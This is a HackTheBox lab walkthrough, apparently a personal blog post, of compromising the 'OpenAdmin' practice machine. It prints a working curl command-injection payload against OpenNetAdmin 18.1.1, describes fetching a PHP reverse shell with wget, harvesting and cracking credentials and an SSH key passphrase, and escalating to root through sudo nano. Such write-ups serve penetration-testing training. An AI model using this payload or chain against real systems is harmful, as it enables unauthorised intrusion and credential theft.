OpenAdmin Walkthrough HackTheBox
Openadmin is a machine on HackTheBox platform with an IP address of 10.10.171. The machine will be retired today meaning its time to release a walkthrough on it. It is rated to be an easy box and therefore it’s good for beginner penetration testers to practice their hacking skills. The box is pretty straight forward with few rabbit holes. If you do your enumeration correctly it becomes really easy to get root on the box. It starts of by finding a webdirectory that hosts a web application Opennetadmin and that specific version (18.1.1)has a remote code execution vulnerability commonly known as (RCE) we leverage that and get a shell on the box. Then we find password reuse going on and use that to escalate our privilege to a certain user. For root we find that a particular user can run nano as root without having the root’s password we then find away to open a shell from nano as root. Without much say,Lets jump right in.
We’ll start off with a NMAP scan to find the ports that are open on the box
There are only two ports open on the machine which makes our job easier when it comes to enumerating the box. Now let’s enumerate the web server on port 80 because that's likely our exploitation path. Opening the website
We get the default Apache2 webpage with nothing to much interesting to look at i tried to look for common website files like robots.txt but i got nothing interesting. So i decided to do directory bruteforcing using gobuster a tool that i came preinstalled on my operating system Parrot SEC OS
And we get three directories that are on the web server i started by enumerating the sierra directory.
I first opened /sierra
And got nothing that i could exploit
Second i looked at /artwork
And still didn’t find a low hanging fruit that i could exploit
Lastly i looked at /music
Nothing seemed interesting until when i clicked the login page it took me to a whole different page
Looking at the tab of the browser it exposes the name of the web application as OpenNetAdmin and also the version number of the software as v18.1.1. So i decided to do a searchsploit on it
And we get 2 exploits from searchsploit which indicates that the web application was vulnerable to Remote Code Execution (RCE) two of them corresponding to our exact version of the web application software one of them is a metasploit module but for the purpose of demonstration i will be using the bash script
I decided to use the bash script exploit since metasploit automates everything. I copied to my working directory and decided to take a look
I decided to use the curl command alone without the additional arguments used in the bash script. The payload is as written below
curl — silent -d “xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \”BEGIN\”;ls -la;echo \”END\”&xajaxargs[]=ping” “http://10.10.10.171/ona/" | sed -n -e ‘/BEGIN/,/END/ p’ | tail -n +2 | head -n -1
And we have code execution. The next step is obviously getting a shell on the box i tried to use Pentest monkey reverse shell cheat sheat
I tried several other shells but none didn’t work but we already had command execution and the box has wget already installed so i decided to upload a php reverse shell and execute from the box since it offers a much stable shell [Ensure the IP adress and the port you will use as a listener is correctly configured]
I hosted a simple webserver using SimpleHTTP python module and downloaded the reverse shell to the box
And when we do directory listing again
Now we can execute and get a stable shell on the box
And we get a shell that doesn’t die. Looking at /var/www there’s a directory called internal when i tried to access it i got a permission denied since it belongs to jimmy and internal
The user www-data doesn’t have access to that direstory maybe we’ll come back to take a look at once we escalate our privileges
Now i started to doing manual enumeration on webapp config files sometimes you might get lucky and find so credentials. In /opt/ona/www/local/config we get a database mysql config file.
I decided to log into mysql because maybe we might get credentials in it
I decided to see what tables are in that database
The only table that seemed interesting was users
And we get mor credential from mysql database
And we get 2 MD5 Hashes when i decrypted them using hashcat
guest:098f6bcd4621d373cade4e832627b4f6:[Decrypted(test)]
admin:21232f297a57a5a743894a0e4a801fc3:[Decrypted(admin)]
Nothing else seemed interesting in the database
I decided to use those credentials and see if i could escalate my priviledgegsb to root since admin and root are basically the same thing
It didn’t work so i decided to take a look at passwd file to see users that have a shell on the box and got two more users jimmy and joanna
I decided to try those credential that i had already found with there account got a valid credential for jimmy
jimmy:n1nj4W4rri0R!
It seems like there was some kind of password reuse going on
Now i again tried to access the internal folder and didn’t a permission denied
There are three files on that folder main.php seems more interesting
The php must be hosted using a webserver and a particular port MUST be used. I decided to look at open ports on localhost to see if there was a port that might be interesting
And we get that port 52846 that is hosted only localhost that’s why we didn’t see it when we did a nmap scan and it’s the only port that looked odd since all the other port are used to run stardard services
I decided to see if i could access that page using curl which is a command line tool for transferring data with URL syntax, supporting DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3,POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP.curl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest,
NTLM, Negotiate, kerberos…), file transfer resume, proxy tunneling and a
busload of other useful tricks.
And we get joanna ssh private key that is encrypted
That’s one way you could discover that that specific port was open. When i initially did the box i used wfuzz and fuzzed 65535 ports to find which ports were open (i know it was dumb)
But away from that we have the private key that is encrypted why don’t we crack the passphrase using john the ripper
I copied the private key back to my box
I used ssh2john which is a python script that converts the key into a format that john the ripper can understand and crack the passphrase
And finaly we got the passphrase bloodninjas. Now we can log into the box via ssh using the private key after giving it the appropriate permissions (chmod 600 private_key)
Now we are in the box as joanna
We can now submit the user flag and get the points
Now we have to escalate out privileges to root. Doing sudo -L we get the user joanna can run all command nano as root without a password
Now we have to find a way to either execute commands while we are inside nano or be able to read or write files
Looking at GTFOBins We get there’s a way to execute command which insided nano text editor
When inside nano press Ctl+r followed by Ctl+x
Nano will prompt you which command you want to execute. The command essentially opens a shell on the box as root
And we get a rootshell after the command is executed
On clearing the screen we have a shell as root on openadmin. Now we cam submit the final flag and get the points
And that’s how i did opennet admin. I know you can also ssh tunnel the local port running the webpage and access it through your box. But that could have be a valid technique if there was no other way that i coud have had access to the webpage. But i have a walkthrough of another machine Servmon from HackTheBox coming up once it gets retired that i will show that technique. That’s it for now guys take care and have a nice time stay SAFE as we fight this disease COVID-19 and pratise safe hacking. Till next time it me Ian Musyoka signing off………….
If you liked the walkthrough you can clap for me down below